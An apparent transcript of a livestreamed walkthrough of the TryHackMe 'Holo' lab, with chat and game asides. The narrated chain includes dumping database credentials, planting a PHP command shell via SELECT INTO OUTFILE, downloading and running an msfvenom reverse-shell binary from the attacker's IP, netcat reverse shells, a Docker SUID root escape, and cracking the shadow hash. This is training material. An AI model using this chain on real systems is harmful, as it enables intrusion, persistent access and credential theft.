flag. Okay, so we there should be a flag somewhere, I guess. User.txt. There we go. We got a flag. So we are running as the www data user, so our home directory is pretty much almost guaranteed to be var www. So we can submit the flag up here. This one, I guess. No. Is that the web application one? Can't be that one, can it? Okay. Oh, inside of the container, right. Makes sense. Okay. Living off the land. So we can port scan using bash. Yeah, I know dev TCP IP. Yeah, so this is how you can get reverse shells sometimes. I think that may have been how we got a reverse shell in this one. Yeah. We can use Advantage to scan internal ports by piping a list of ports into it. Find an example of a full bash port scanner below. Okay. Second method. So basically this is doing port scanning without using Nmap. I guess we could have also technically you can run a proxy. So we could have run a SOX proxy and done it. It might not be that reliable. Okay, so what else can we use? Alright, so we can just copy over Nmap. I think I might have static binaries. I think it's in Kali. Maybe not. But I presume we can just download. Maybe not. Alright, let's try building this then. Screw it, why not? We've got tools. Okay. Oh, mmap's there. Alright, so can we just do... Let's try this. I thought I had Docker and... Oh, I had Docker running. I do, okay. Alright, let's try this. We'll see how it goes. I don't really want to write a bash port scanner or a Python port scanner right now, so yeah. Okay. So do it. Is this gonna fail? Sure looks like it. That's unfortunate. Okay. I guess we could just create an MSF Venom payload with Meterpreter, and then Meterpreter has SOX proxies in it. So why don't we do that? Because I'm not, unless anyone knows where there is a downloadable static binary of Nmap. I don't think. I think I've only got Windows ones on here. Okay, there we go, Angel. How do I copy that? Okay, cool. Let's right, yeah. Well, we probably don't even need the we don't need the scripts, do we? We'll download the whole thing anyway. Screw it, I'm gonna clone it. Why did it copy 80? Okay. Static Nmap. Okay, so now we can copy Nmap to our web server. Copy our IP address. Go back to here. Do we have wget? No. Do we have curl? We do have curl. Okay. I'm gonna check what the curl lowercase o is output. So if we do curl lowercase o, actually, can I write to this directory? No. Okay. Which directory did I have write access to? WordPress. Okay. I have write access to this directory, so I can do a curl mmap http mmap. I think. Looks promising. And then if I obviously have to chmod it mmap-h. Hooray! Alright, so let's write that in our notes. So we downloaded. I'll make sure we note that. Writable directory. Downloaded static nmap. This is just so we can get back to this point. Assuming we don't get proper credentials today. Maybe we will. All right, let's do an nmap scan of this host. So /nmap pn sv 127001. I guess we do need the scripts then. Oh, maybe just not the versions. Maybe we just do that. Alright, yeah, that worked. If you want versions, you can't have versions. Okay, once this is scan all the ports as well, so let's do that. So we'll do -pp. Alright, so there literally are only apparently 2 ports listening on this. But we can. Alright, we want to scan the other box. This one, right? Because we're currently on this one. So 192.168.100.1. Alright, that might take a while. No, it didn't. Alright, cool. I'm going to copy this. We're going to create another note for 192.168.100.1. Did we get a host name? We didn't, but we have one here. lsrv01. SRV01, I think. Yeah. Okay. So yeah, so we can check the database credentials. So maybe we'll check those. Because remember we had these here. Actually, these are database credentials for that 100.1 box. So these weren't database credentials for this, which is interesting. I'm just wondering why they have a database hosted on the internal box when they can just... They have one running on this box. That's weird. Okay, well, let's go back to the questions. What is the default gateway for the Docker container? Okay, unless this is the Docker container. Alright, hang on, let's just run IPA. Okay, ifconfig. How'd you get the gateway on Linux? Yeah. Is it just root list? No. Okay, we're gonna Google. Get gateway Linux. Yeah, so we don't have IP. So we can't use that. Route-N. Alright. Alright, so that is the gateway, okay. What is the high web port open on the container gateway? Okay, so let's just map it again because I can't be asked to scroll up. I'm guessing 8080 is the high web port. And what is the low database port open in the container gateway? The low database is this one. So this one I'm assuming is another database. I mean, it kind of looks identical, right? It's got an extra 0, 3306. Okay. Okay. Moving on. All right, so this is where we use the database. Right, now we can connect to the database. So this is what ends up happening. We always end up kind of getting ahead. We were already thinking about connecting to the local database. So let's try that. We're using MySQL, admin, password. Was there a database listed? Yeah. This might not work because of the bangs. We'll see. Oops. Let me just make sure. Alright, access denied for user admin. I wonder if we can just get to the... Alright, yeah, because that's the local host. So we actually need the host. I think it's just dash H, actually. Let's just... yeah, it is dash H. So, okay, so we should be able to run this and just add dash H 192.168.100.1. Since that was, if we go back here, the database server here. Oops. So I don't entirely know why there's a database running on the host, but let's see. Okay, good. All right, we got in. All right, so let's copy that command. So MySQL to 192.168.100.1. All right, show databases. All right, so pretty much these four are standard. This is the one we're currently in. If we do show tables, there's a users table. So we can, since it's MySQL, we can describe users. And we can see the fields. There's only a username and password. This is looking promising. Select all from users. Okay. So let's copy that. So I wonder now, can we... well, this was the admin for the database login. So now we can log in as Gurag, I guess. How do I log out? Can I actually refresh this or not? No, it's going to do that stupid thing. Can I just open a new one? Yeah, okay. What was his name again? Gurag. So we can log in. It's Gurag. Clear passed from the database. I know, crazy. Why is this taking so long? Unfortunately, there doesn't seem to be anything else, though. There were no other tables. And why is this taking so long? You know what? To hell with it. We're going to use burp. I'll turn the incept off. Gurag, was it 4 A's? Okay. I'm not entirely sure whether this will do anything. It doesn't look like it's... So I'm imagining then maybe Gurag has reused his credentials. So the other question is, can we SSH onto this box now? SSH not found. Oh dear. Okay. What was the... Yeah, is SSH available? We can try curling. If anyone wants to spend 500 channel points, you can do the fail thing now. Alright, this is a WordPress blog. You can pretty much tell that from that. Okay. Let's... I think it's probably... There we go. Nice one, Shy Hat. Okay, so I don't think Angel was around for the Mr. Streamer one. Does someone want to play that again? I have a new alert for people to use when I'm on the wrong screen. Okay, let's... No, I didn't went to them. So let's use MSF Venom. We'll do list payloads. Yeah, so the fail one you can only use every minute. It's just to stop people spamming it, even though it is 500 channel points, whatever. The Mr. Streamer one should still be fine. Alright, so we're gonna have to look up for a Linux interpreter. Should have probably grepped, but I'm an idiot. I'm gonna assume. There we go.
Mr. Streamer.
There we go. There you go, Angel. That's what I put up earlier. I'm gonna guess it's x64. It probably is. Let's just do the standard reverse TCP. All right. So the question. Actually, no. That's not a question. P L host equals ton 0. L port. Let's do 4444 again. We'll make it an ELF file. I mean, we're pretty much going to do this, right? So reverse.elf. Alright, so this should create an interpreter ELF file, which is effectively like a Linux binary kind of. And what we'll do is we will use curl to do reverse.elf. HTTP / my IP address, which I always forget, is that reverse.elf. Should be good. We can chmod that plus x reverse.elf. Okay. And now what we want to do is MSF console. Were there any other questions? What is the server of the remote database? Where's the password? It's this one. Can answer a few things. Username is admin. Database name was dashboard DB. The username was Gurag. Nice. Moving on. Okay. It looks like we're going completely the wrong way, but I'm going to keep going with this because it's probably useful to know. We're going to use multi-handler. And then I just need to set the payload to this. Why do you hate me? Good. Set lhost to ton 0. Run. Okay, so now if we run reverse.elf in the background, we should get this. Hey, Karl Mark. Okay, so now we have a interpreter running. We can close this thing down. There should be not the port forward. I mean, we could just use port forward, to be honest. So let's do port forward. Okay, this is where I'm gonna have to. Oh, hang on. I think we're supposed to start a battle. Alright, so let's just do string raiders for a minute. There we go. Poor GoPro Slow-Yo. He's running away. He's being chased. Did he get killed? I got killed. We lost, but oh well. I tell you, well, I guess we'll go We go back to this one. Or do we have to... How do I do this? I have no idea how to. I have no idea how to use stream readers, unfortunately. Start new map. Yeah, sure. We'll do that one. All right, switch back. Okay, hang on. Related interpreter. What C2 frameworks do you like to use? I don't use C2 frameworks. I'm a web app tester, so I rarely get a reverse shell anyway. But anyway, all right. I'm trying to remember the syntax. I want to basically listen. Local port to listen on, reverse local port to connect to. I think we do it. So we're running. Yeah. Okay. So we want to listen on. Let's just say 5555. Oh, actually, hell. Let's do 2222. The port we want to connect on is 22, and the remote host 192.100.1. I think that works. And we need to do add. Okay. And now hopefully, if I go here and we grab the IP address of admin.holo.live. Okay, well, that worked apparently. Anyway. Now if we nmap no, okay. Why did that not work? I probably need to do a host to listen on, that's why. ifconfig. Alright, this might not work at all, so this is useful to know though, I guess. So list delete 1. Delete -i1. Yeah, so that was okay. That was listing on 0, 0. Okay, so that didn't work at all. Although I think actually it should be the reverse. Okay, so let's try this. Alright, no. I think I was doing the right way. That's not going to work. And by the looks of it, it's not the way we're supposed to get forward anyway, so. We can escape the container by exploiting the remote database. There are several ways to escape a container. Inject PHP code to gain command execution. Drop table contents onto a file, user access. Okay. Gotcha. Okay, so this is OSCP stuff, really. Alright, let's go back to Netcat. Let's connect back to this. So the idea is that we should be able to, as the database user, write things to the web server. Okay. So what we can do is we can test that theory. We can select, let's just do Tiberius into out file. I think the syntax. Alright, so I mean it's giving us var www HTML. Let's just do test.txt. Okay. And then what we can do from our other shell here is we can try and curl 192.168.100.1 test.txt. That did not work. Page not found. So it might be that we do this. Okay, hang on. What is that error? I mean, so it does look like the first one ran, so it should have created... It should have created something. Oh, this is on the Holo site as well. Okay, so actually... Right, this should be... Let's just try doing it into a PHP file. So it looks like... Try that. No. Word. Okay, so WordPress. So maybe the file structure is identical. Maybe it's no. Alright, let's just look it up. MySQL into out file PHP. I swear if you just select something... Oh, maybe... Yeah, that should work. There we go. So it did create it. I wonder if there's that. No. Okay. So I guess the other question, there was another HTTP port. 180.80. There we go. All right, that was it. So you see, we managed to write to this. So now the question, though, is, okay, can we get to this site? What is on this site? I'm gonna use curl. Yeah, it's WordPress, but I'm gonna use curl-i. Alright, so just give it 200. Okay. Did I use? Sorry, did I do up here? I did. Oh no, I didn't. Okay, right. I forgot to add the port. 8080. Alright, what is this? Alright, have we seen this before? Is this the dev site, I wonder? So let's try looking at the dev site. What I'm trying to do is I'm trying to find whether we can access this site. Access the file through the main web server. It doesn't look like it. Unless the file disappeared. Maybe the file's gone. Let's just make sure it still exists. 8080 test.txt. It still exists. So, yeah. It's not looking like we can actually view these files. So if we do test.txt here, we get a 404. If I change this to admin, and finally if we try, so that's a 404 as well. If we use dub, yeah. So what we're going to have to do is just change this in there. So the next thing we should do is check that PHP actually can execute. And so what we'll do now is we'll do test.php, and we'll change this into some basic PHP code. Let's just do echo Tiberius and that. Test.p, or okay, right, so yeah. Test2.php. And so we'll do the reason we can't do a curl on holo.live 8080 is because port 8080 is not open on that web server. Okay, that works. See, echoed Tiberius. It didn't reveal anything else. So effectively, this is the IP address we have from the main network. If I was to do a search for 8080 on it, I don't think it's closed, see. So what we're doing now, we have a shell on this box, and from that box we can connect to the this box here. No, sorry, this box here. And this box has 8080 open. What I was hoping, though, was that the 8080 port was mapped back to dev, but it's not. So we're going to have to create... Okay, so now we'll create cmd.php. And what we'll do is we'll echo. Let's just do shell exec $get cmd. Close that. That looks good to me. Yeah. Okay. So we'll do that. We'll set up another reverse listener. Actually, I'll check my IP address before I do that. Oh, did I not do... No, that should work. Oh, you mean put quotes around it? No, you don't have to do that. PHP will complain about it privately. It'll say, oh, because that's a key to an array, you can technically pass strings like that. So it should technically work. If it doesn't, we'll try it. But as far as I'm aware, it'll just complain. Actually, we can just try it now. And I think if you just PHP that. Oops. Yeah, it'll just say this. It's a notice. Undefined index, CMD. But it should be fine. If I, for instance, move test.php to my var.dub and do cmd.php or whatever, go to my browser, do localhost. Sorry, yeah, it was cmd.php, cmd equals id. You still get it. It works. It'll complain in the logs, but it still works. Yeah, PHP is very forgiving. All right, let's set up a netcat listener. So let's see if we can get a shell back on this box. Where's the reverse shell? We can put that in there. Sure, let's copy this one, I guess. URL encode it. That worked before. So now we can do curl. I guess actually what we should firstly do is make sure it actually worked. So 18080 cmd.php cmd equals id. It did. It worked perfectly. Good. All right. HTTP 192.168.100.1 8080 cmd.php question mark cmd equals, and then if I put that in, do we get something? Doesn't look like it. Oh, hang on. When did that happen? Am I still connected? I am, okay. 10.50.141.16. Okay, so it's possible that particular exploit didn't work. It's also possible it didn't. It just didn't connect back to us, so we can at least check that. So what we'll do is we'll do curl %20 http / 10.50.141.16. It's 8,000, yeah, 8,000. Okay, it can get back to me. It definitely can get back to me. All right. So it's not a problem of that. It's a problem with our payload. So we can try netcat. Netcat's generally alright. So... Oh, jeez. Probably shouldn't have done that from my home directory. CMD. And then back to here. Copy our netcat reverse shell. And okay, that didn't work. I think I need to put quotes around it. It tried to execute some of that as actual code. No, that's not liking it either. Okay. We could just mess around with reverse shells, or we could try single quoted. I mean, it's not showing any errors, so it is probably trying to run it. It's probably just not working. What I'm going to suggest is, instead of doing this one, we just download our reverse shell again. Right? So I think I can just... Can I just cancel this? Terminate channel. I think I could... Yeah, so hang on. Yeah, sure. We can try the port. I don't think it's the port. Maybe it is though. So if we do the same thing again, all the way to that. 8,000, and then all of this. Yeah, it's not the port. So what we'll do instead... Hey, Al's here. Shall we show him, guys? Shall we show him what I've created? Somebody use the channel points. Go on. You know how you have "Hey, listen," Al? I've gone one better.
Mr. Streamer!
I've done that. Let's see if curl... Alright, curl is available. Let's do wget maybe? Oh yeah, we got wget. So what we'll do is we will wget HTTP 1050 141.16 reverse.elf dash capital O temp reverse.elf should work. And what we'll do this end, we'll tail the Apache logs. See if that works. Did. Perfect. So now what we need to do is just confirm it's there. We'll do ls-l temp Boom. Okay, so we need to chmod it. Chmod. So this is where it's going to get difficult because you can't do a plus. So you're going to have to do %2b x. And let's just run the previous one again just to make sure it's actually given it execute, which it has. And then finally we can just execute it. We tried the bash method. I wonder if we can background it. Actually, what am I doing? I have burp. What is an ampersand encoded? I always forget. I think it's 3 something. No, 26. Right. So plus. There we go. Ah, it failed. What happened? Oh, I know why. Because it's a Metasploit payload. So that's why. I completely forgot it was a Metasploit payload. So actually I can just do X there. Alright, hang on a minute. Let's just use multi-handler. Run. Cool. Alright, so we should just be able to run it again. Or not. Okay, we're getting something. What does the walkthrough suggest? I guess we've skipped ahead. We can find out who the database user is running as, I guess. Let's do the boring thing. Who am I? Data. Create a reverse shell. Right, so I guess, yeah, okay. I guess this is the way it wants us to do it. It must have, it must have some detection, I guess, for Metasploit, I would imagine. Maybe we can just try some more reverse shells. Where's rev shells? GitHub. I'm not going to give up on this. I'm not going to take the easy way out. Actually, I've got one on. Well, actually, Pentest Cheat Sheets does have one, but I've also forked. Where is it? Rev Shell Gen. There we go. There's a bunch of them here. Let me clone it. I really want this to just work. Okay. All right, list. What? Oh, what do we? What's required actually? Ports required. Okay. Alright, I mean NC-E is not going to work, is it? Let's try... We tried make first in, first out. Let's try make nod. This might work, I guess. We obviously have to URL encode this. We don't want to burp URL. I just want to completely trash this. So URL encode. There we go. All right, let's try it again. We'll exit out of this. We'll NC again, and then we'll do. All right. There we go. That worked. When in doubt, keep trying NC ones. Alright, where's the...
We are in.
We're in. Alright, we'll quickly do some more Stream Raiders. Did I even put my own character on here? I'm not sure I did. Alright, you're in. I didn't even put myself on the screen.
Mr. Streamer!
We gotta wait for the battle to be over. I guess they're collecting presents. It's gonna be a slow game. Yeah, so we have got a shell, which we will presumably do something with. We got it in the way I guess they didn't want us to get it. What I'll do is I'll record. While you guys collect the presents, I'll record the method where we got that. Alright, so... Nice. Well done. Random rewards. Back to the map. Where are we? Alright, I'll be there we go. Alright guys. Switch back to the live screen. Okay, so I've updated that we get shell on 192.168.101. So in the MySQL we do that, and then in our shell we just do this, right? It ends in FL, yeah. Oops. Okay. So let's go back to Holo. obtain a shell. We did not do it this way, but whatever. Submit the user flag. Let's do ls-l. I guess cd up one. There it is. Okay, can't use it.txt. Alright, we got the next flag, which we can submit back here. Nice. Okay. Oops. So we did. I mean, so this method, it looks like what they did. They created a bash script which you host locally, and then they used curl to grab the script and then pipe it through bash, which also works. I think my way's quicker. All right. Well, we don't. Let's do the Privesc, I guess. We will. Let's grab a better shell. Copy that. I'm guessing Python's probably not going to be enabled. All right. Python 3 probably. Please tell me I haven't killed it. Good. There we go. All right. So we got our shell. In fact, I will copy that command just so it's in here as well. All right. Okay, so what we can do is obviously run linps, but before we do, we should probably check and see if we can just run sudo, which we cannot. And we'll try and find some SUIDs. It would be very weird if there didn't exist any. There we go. All right. Docker is interesting. Let's go to GTFO bins. There we go. If we have SUID, it does not drop elevated privileges and may be abused to access the file system. Escalate or maintain privilege access. If it is used to run sh-p, admit the p argument on systems like Debian that allow the default. Okay, right. So, this example creates a local SUID copy of the binary and runs it to maintain. Okay, cool. So I'm not entirely sure this is gonna work, but actually it should. But we'll change it so it's bash because I like bash better. So I think what it does is it makes a I'm just gonna run it. I think it makes a copy of bash that we can run. Let's try it. Okay, so it may. Right, so that may not work at all. Great. Docker SUID, no internet. Docker SUID Privask. Yeah, so that's what I'm looking for. So Docker spawn shell. Docker run idea of running containers. Okay. Yeah, that's what we need to do. So Docker, you say list images. All right. Guess not.
Mr. Streamer!
That's not what that's used for. Use it to get my attention. Docker images list. Alright, there's nothing. Docker container list. List running containers, I guess. Docker container ls. There we go. So there's a container ID. So we should be able to do Docker. Was it run? Yeah, Docker run and then bin bash. Hang on. Yeah, I already searched Docker SUID Privask. Why is that not working? Am I using the wrong? Yeah, it's the image. Okay, image name then. Docker run that bin bash. So if I exit out of that, I should be back in my shell. No. Yes. Am I on the right? Alright, I need to run the... I need to run that again. Or maybe not. No, okay, hang on. There we go. So the Docker... Docker SUID Privask. The GTFO bins one did not work. But maybe the container. Okay, so maybe if we pass it the container ID. So yeah, maybe the problem is this Alpine thing. You're just saying use bash? We can try it. There we go. Yeah, no, this isn't. So it doesn't find the image bash. So I think we actually just need to put the image name in. Right, Alpine's the image, but we can't connect to anything. So we need to use the image name. This thing. Yeah. That makes more sense now that I think about it. So basically, effectively what we're doing here is we're mounting the root directory of the container to our /mnt, and then we're cherooting mnt and then running bash, I believe. I'm not sure we'll have permission to do that, but we'll check. Maybe we do. Of course, we'll have permission because we're running as SUID. Right, yeah. I'm not entirely sure if this is... No, okay. We gotta be a bit patient, I guess. Okay. It failed. Let's try it again. Just wait instead of trying something, I guess. Bin bash instead of bash. Potentially, yes. So looks like it's going to fail as well, right? Yep. SUID. The thing is, this... This looks like it should work, and it doesn't. Alright. Can I try something? Yeah, I can try anything, really. I can't run sudo. And that really won't... all that does is it installs Docker as an SUID. That's just the first command. With GTFO bins, there's like a setup command sometimes. I can't install stuff. Okay. This is saying linps. This looks like the right method. Wait a minute, there's a dig SUID? Did I miss something? Oh, why did it crash? Oh no. Alright, hang on. Oh, everything crashed. Did the thing time out? Yep. Oh boy. I'm gonna scroll up because I swear I didn't see dig in there. No. Yeah, but the thing is, I can't run sudo. Alright, hang on. So let's just answer these questions, because it looks like it is Docker then. Alright. Full first line of the exploit for the SUID. So it is this. That's weird. Alright, we'll try it again, I guess. Okay. It's going to take a while to get back. The network hasn't been unstable, no. Alright, so we need to go to... There was an... Oh. Yeah, there weren't any images, were there? Okay, so we're going to do a netcat. And we'll go to admin.holo.live. We'll use these credentials. We'll use that. Oh, I was in a frickin'... Great. Okay. That's alright. We'll close this one. Okay. So now we can use this. Did that work? Nope. I'm just going to use this again. Alright, we're going to refresh. And then we're going to use...
Mr. Streamer!
Alright. Please don't abuse the that sound alert. It has a purpose. The purpose is to tell me that I'm on a different screen or something. Alright, let's try this. Oh, that's not going to work, so I have the... I should really... Alright, this should now work. I don't know why... There we go. Alright, yeah, I just have to be in the beta shell, I guess. We'll do this again. Alright, it already exists, so even though the network reset, it's fine. And then we'll curl again. So I'll use this to set up another reverse listener. And then we should be able to, if we exit, and then run that. No, I need to curl that. Alright. Hostname. Just make sure this is different. Oh, of course that's going to keep running. Let's do this again. This is why taking notes is really useful, because you can just get back into the box after a few commands. Alright, so yeah, we are on The CMD box. Yeah. Okay, we're on the good box. So, I mean, I can try running this. I don't think this is gonna work. I think this is just how it creates. Yeah. So I did try it, but yeah, that's just how they create the file. I'm just gonna run this. Unable to find image Alpine locally, so I guess yeah. Let's Docker list images, list local images. I guess. Docker images. Ah, we got Ubuntu. Okay. That's a bit better. And then we can bin bash -p, I think, right? Actually, no, it's running as root, so we should just bin bash it. Okay. Maybe it's the image ID. Oh yeah, that's right. You need the 18.04. Alright, let's try this, see if this works. Hey! Alright. Where's the,
We are in.
We're in. Okay. Finally we got there. So we'll copy this command. And put it here instead of this stupid one. Right. Privesc. Save that. Okay. So let's do an ls. Go into root. Cat root.txt. Alright. We've rooted. Box. Submit the flag. Routing this. Okay, so we now have root on this box. I'm wondering if we should stop there. It does seem like a good place to stop. Anyone else think? Unless the oh right, yeah, so no, it's not. It doesn't look like it did mount it. But yeah, I think oops. No, we're not in the container. There's no Docker env. I think we're on the I think we're on the host. I'm pretty sure we are. Unless I'm missing something. No, actually, maybe. There's definitely nothing in mount, which yeah is weird because we did ask to mount. Alright, well I guess we'll just do these questions. We dumped the shadow file. Let's copy. Alright, oh yes, no, yeah, so that's sorry, yeah. That's why we basically mapped the root directory to MNT, and then we cheroot it, which means we basically set up an environment where this was the root. Right, that makes sense. Yeah, so we are technically in /MNT right now, on the main box. All right, let's copy across this thing. So we're on this now. Oh, the default user, non-default user is going to be Linux admin. Okay, I'm guessing we want to crack the hashes so we can do. We'll just, I think we'll get to the end of this and then call it a night. All right, so let's grab this hash, which is just this all the way to there. Holo, oops, TryHackMe Holo. Okay. Which box are we on again? LSRV01. Hash txt. Sorry. Linux admin hash. All right. We will see if this cracks it. Power of Google Colab to crack hashes. Alright, well that's hopefully cracking. We will switch over to Stream Raiders and start the battle. Alright. Okay, that'll be enough Stream Raiders for the night. Still cracking. I could load up PowerShell on my main machine and crack it. Might do that actually. PowerShell. Okay. I will need to copy the hash though. Add some. Okay. Okay, I got the hash. And if I go to tools, cracking, hashcats, that one. I think if I actually run it. Right, so I need to use that. The mode is 2500 apparently. Oh no. 1800. Oops. Where am I going? 1800. Actually 0. Linux user hash. Well, let's rock you. Oh, whoops. It'd help if I did the exe instead of the .bin. There we go. Alright, so now we've got the power of a GPU at least doing it. Which is probably going to take a shorter amount of time than this, so we'll keep it running anyway. Oh, is it not SHA?
I can't hang up.
No, it is SHA 512.
I don't want this to end.
Yeah. Yeah, this effectively... I mean, this thing said, for some reason it's listed as 2500, but it's not. Yeah, so, okay, it's cracking now. I mean, this says it'll take 5 minutes, so... That's fine. Next section's on pivoting. Alright, so next week we will we'll start with the pivoting. I take it so we're currently on this box. I mean, our obvious target's this one, right? Oh no, actually, we're on this box. This is the Docker container. Okay, right. Or is it? No, we're still on 0.1. All right. So it looks like we're going to be using SSH shuttle or proxy chains or something like that. That'd be interesting. Have we cracked it? No. Hopefully everyone is enjoying this series, by the way. It's definitely interesting to me as well, so mostly because I don't get to do this kind of thing with the like the big networks and pen testing. If it's not in Rock U, I'd be surprised. But again, stranger things have happened. So next, I think I'll next be streaming probably on Monday. Maybe I might do a Sunday stream if I feel like it, but next one will be Cyber Mentoring Monday again. Where I think we still need to finish Hack the Box starting point. And assuming we finish that quickly, we will also do an easy Hack the Box. Yeah. And at some point I want to do a web app stream. Someone requested in my Discord server a web app stream for web cache poisoning. So that might be useful or interesting to some of you. It cracked it. Linux rules. There we go. Okay, and I'm actually kind of surprised that was in Rock U. Alright, we are done. Okay, guys. Let's try and find a streamer. Oops, sorry. To raid. Who is online? GoPro Sloyo's online. We'll raid him. He was in the stream earlier, so we'll raid here. GoPro Sloyo. Okay. I will put up the stream ending. So again, once again, please follow me on Twitter if you have Twitter. Join our Discord server. Subscribe to my YouTube channel, where I'm hopefully going to try and get back into actually uploading these, like the VODs. And obviously, you're following me on Twitch. Well, I hope you're following me on Twitch. You are watching me on Twitch, so please give me a follow if you have not. And yeah, I will see you guys next time. Let's raid.